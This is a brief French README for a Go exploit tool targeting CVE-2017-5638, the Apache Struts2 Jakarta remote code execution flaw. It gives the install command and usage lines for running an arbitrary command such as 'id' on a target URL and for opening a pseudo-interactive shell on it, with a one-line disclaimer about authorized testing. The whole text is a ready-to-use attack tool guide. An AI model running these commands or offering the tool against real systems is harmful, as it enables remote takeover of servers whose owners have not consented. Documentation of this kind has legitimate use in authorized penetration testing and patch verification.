
Exploit Golang pour CVE-2017-5638
N'utilisez cet exploit que sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test
Si vous avez déjà Go installé sur votre ordinateur, go get est la solution à adopter
go get github.com/Greynad/struts2-jakarta-inject
Exécution d'une seule commande
struts2-jakarta-inject -u <url> -c 'id'
Shell pseudo interactif
struts2-jakarta-inject -u <url> -i